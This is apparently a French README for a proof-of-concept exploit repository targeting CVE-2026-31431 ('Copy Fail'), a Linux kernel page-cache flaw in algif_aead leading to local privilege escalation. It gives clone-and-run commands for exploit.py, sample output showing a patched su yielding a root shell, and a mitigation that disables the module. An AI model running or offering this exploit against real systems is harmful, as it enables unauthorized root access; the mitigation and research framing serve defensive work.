
CVE-2026-31431 - Vulnérabilité du cache de pages du noyau Linux
Ce projet est fourni strictement pour :
L'auteur et les contributeurs ne sont PAS responsables de toute utilisation abusive, des dommages, pertes de données, interruption de service ou activités illégales réalisées avec ce logiciel.
Outil de recherche de preuve de concept pour CVE-2026-31431, également connu sous le nom de « Copy Fail », une vulnérabilité du noyau Linux affectant l'implémentation AEAD algif_aead / authencesn.
La vulnérabilité pourrait permettre une corruption du cache de pages dans des conditions spécifiques, conduisant potentiellement à une élévation de privilèges locaux sur les systèmes vulnérables.
Clonez le dépôt :
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
python3 exploit.py
python3 exploit.py --exploit
Lorsque invité :
Type 'YES' to continue
python3 exploit.py --cleanup
python3 exploit.py --help
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
Si vous êtes administrateur système et devez atténuer l'exposition :
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null